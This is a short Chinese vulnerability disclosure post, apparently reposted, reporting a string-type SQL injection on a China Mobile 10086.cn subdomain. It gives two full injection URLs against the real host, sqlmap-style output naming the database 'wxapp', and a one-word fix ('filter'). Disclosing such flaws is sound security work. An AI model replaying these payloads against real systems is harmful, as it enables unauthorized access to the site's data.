首页 » 漏洞 » 中国移动10086.cn某分站SQL注入漏洞

中国移动10086.cn某分站SQL注入漏洞

 

code 区域
http://dm.10086.cn/weixin/index.php?s=/addon/Biaobai/Index/bb/uid/126654%27%20and%20%272%27=%272/
code 区域
http://dm.10086.cn/weixin/index.php?s=/addon/Biaobai/Index/bb/uid/126654%27%20and%20%272%27=%271/

字符型的注入,用的还是套php模版

漏洞证明:

同上

available databases [1]:

[*] wxapp

修复方案:

过滤

原文链接:中国移动10086.cn某分站SQL注入漏洞,转载请注明来源!

0